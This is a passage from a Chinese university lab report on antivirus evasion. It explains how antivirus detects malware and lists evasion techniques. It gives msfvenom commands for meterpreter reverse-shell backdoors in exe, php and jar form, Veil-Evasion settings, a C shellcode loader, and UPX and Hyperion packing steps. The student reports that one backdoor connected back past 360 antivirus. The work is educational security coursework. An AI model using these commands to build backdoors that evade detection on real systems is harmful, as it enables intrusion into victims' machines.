2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践

2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践

基础问题回答

杀软是如何检测出恶意代码的?

1.对某个文件的特征码进行分析,(特征码就是一类恶意文件中经常出现的一段代码),如果检测到特征码就会被断定为恶意软件。
2.启发式恶意软件检测,是根据某些特征去推断是否为恶意软件。
3.根据行为进行恶意软件检测: 通过对恶意代码的观察研究,发现有一些行为是恶意代码共同的比较特殊的行为,就会认定为是恶意软件。

免杀是做什么?

使用一些技术手段,不让杀软所检测到。

免杀的基本方法有哪些?

文件免杀方法:
1.加壳,如加压缩壳和加密壳。
2.加花指令,一般一个木马程序加入花指令后,就可以躲大部分的杀毒软件,不像改特征码,只能躲过某一种杀毒软件。
3.改程序入口点。
4.改木马文件特征码

  • 把特征码所对应的十六进制改成数字差1或差不多的十六进制
  • 把特征码所对应的内容是字符串的,只要把大小字互换一下就可以了
  • 特征码所对应的汇编指令命令中替换成功能类拟的指令
  • 把具有特征码的代码顺序互换一下

开启杀软能绝对防止电脑中恶意代码吗?

  • 开启杀软能起到防止电脑中恶意代码的风险,但不是绝对的。首先未录入病毒库的恶意代码就有可能避开杀软侵入到电脑。或者可以使用更高级的编码技术来隐藏恶意代码的特征码。

实践过程记录

任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧

1. 正确使用msf编码器,生成exe文件

  • 实验二中使用msf生成了后门程序,在virscan中测试一下。:

    注意:在导入文件时文件名不能带有数字,否则会报错。
  • 面我们用msf编码器对后门程序进行一次的编码,其中-e:选择编码器,-b:是payload中需要去除的字符,-i是迭代的次数,因为shellcode以\x00为结束符,所哟在-b后面要跟一个\x00
    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=攻击机的IP LPORT=端口号 -f exe > xxx.exe
  • 使用一下十次编译的方法:-i后跟一个10即可。
    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=攻击机的IP LPORT=端口号 -f exe > xxx.exe

2. msfvenom生成php文件

  • 生成PHP后门程序使用命令:
    msfvenom -p php/meterpreter/reverse_tcp LHOST=攻击机的IP LPORT=端口号 x> xxx.php
    生成文件如下图:

    放入virscan中进行测试:

3. msfvenom生成jar文件

  • 生成jar后门程序使用命令:
    msfvenom -p java/meterpreter/reverse_tcp LHOST=攻击机的IP LPORT=端口号 x> xxx.jar
    生成文件如下图:

    放入virscan中进行测试:

4. 使用veil-evasion生成后门程序及检测

  • 安装veil成功之后,输入veil,再用use evasion命令进入Evil-Evasion进入如下界面:
  • 输入命令use c/meterpreter/rev_tcp.py进入配置界面
  • 设置反弹连接IP,命令为:set LHOST kaliIP,设置端口,命令为:set LPORT 端口号。输入generate生成文件,接着输入playload的名字:如veil_c_5235:
  • 保存路径为/var/lib/veil/output/compiled/veil_c_5235.exe
  • 检测结果:

5. 半手工注入Shellcode并执行

  • 使用命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=端口号 -f c用c语言生成一段shellcode。
  • 创建一个文件20165235.c,然后将unsigned char buf[] 拷贝到其中:
unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
........
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}
  • 使用命令:i686-w64-mingw32-g++ 20165235.c -o 20165235.exe编译这个.c文件为可执行文件:
  • 进行检测:
  • 将其复制到Windows上,被杀软检测到:

6.加压缩壳

  • 20165235.exe加个压缩壳,得到qy_upxed.exe:
  • 加压外壳的检测:
  • 不过还是被杀软给发现了:
  • 设置白名单之后进行反弹连接:

7.使用加密壳Hyperion

  • 将qy_upxed.exe拷贝到/usr/share/windows-binaries/hyperion/,并且进入到这个文件目录下,使用终端输入命令wine hyperion.exe -v qy_upxed.exe qy_upxed_Hyperion.exe进行加加密壳:

任务二:通过组合应用各种技术实现恶意代码免杀

  • 对半手工制作shellcode加压缩壳不能达到免杀的目的,加密壳有一定的几率是可以达到了免杀的目的。
  • 加密壳的免杀和反弹连接:

任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

  • 使用msfvenom生成shellcode,再使用压缩壳和加密壳进行加壳。对方的主机是win7系统,免杀软件是360,版本是:11.1.0.2001
  • 另一台主机免杀:
  • 反弹连接的结果:

离实战还缺些什么技术或步骤?

本次实验我们只是简单的对文件进行加壳隐藏特征码来免杀,但是现在的病毒库更新速度很快,应该学会结合多种技术来免杀,如结合加壳,更换编码,修改程序入口,隐藏恶意软件共有的行为等来进行免杀。

实验中遇到的问题:

  • 在shellcode进行反弹连接时,恶意软件在win7上无法运行,直接被终止。
  • 解决方法:我先后关闭了杀软,防火墙等软件,但还是没用。更换了端口号也是没什么用,将shellcode拷贝到win7虚拟机也是同样被终止。最后我让同学帮我在他的kali上生成后门软件,并将ip和端口号进行了修改,最后完成了反弹连接实验。

实践总结与体会

本次实验要就掌握msf编码器,使用msfvenom生成各种类型的后门软件,而且最大的收获值学会了shellcode注入。在进行实验的时候遇到了不少的问题,如后门程序在win7上运行时会中断等问题。但最终还是解决了这些问题。
学习完本次的实验对免杀原理有了深层次的了解。对以后网络恶意软件的防范有了扎实的理论支持。

posted @ 2019-03-29 22:13  养浩  阅读(244)  评论(0编辑  收藏  举报